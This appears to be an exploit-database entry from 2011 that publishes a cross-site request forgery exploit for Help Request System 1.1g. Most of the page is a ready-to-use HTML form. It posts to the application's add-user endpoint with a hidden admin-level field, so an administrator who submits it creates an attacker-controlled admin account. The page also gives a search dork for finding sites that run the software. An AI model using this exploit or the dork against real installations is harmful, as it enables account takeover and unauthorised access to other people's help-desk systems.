Help Desk Software 1.1g XSRF (add admin) Vulnerability



EKU-ID: 874 CVE: OSVDB-ID:
Author: G13 Published: 2011-08-25 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: Help Request System 1.1g XSRF (add admin)
# Date: 08-23-2011
# Google Dork: "powered by freehelpdesk.org"
# Author: G13
# Software link: http://freehelpdesk.org/
# Version: 1.1g

<html>
<body>
<form id="edit" method="post"
action="http://localhost/request/index.php?sub=users&action=store&type=add"
enctype="">
Name: <input class="FormItemTextbox" type="text" name="user_name"
size="35" maxlength="" value=""><br>
Login name:<input class="FormItemTextbox" type="text" name="user_login"
size="20" maxlength="" value=""><br>
Pass:<input class="FormItemTextbox" type="password" id="user_password"
name="user_password" size="20" value=""><br>
Pass confirm:<input class="FormItemTextbox" type="password"
id="user_password_confirm" name="user_password_confirm" size="20"
value=""><br>
<input type="hidden" name="user_level" value="0">
<input class="btn" type="submit" value="Submit" id="submit"
name="submit">
</form>
</body>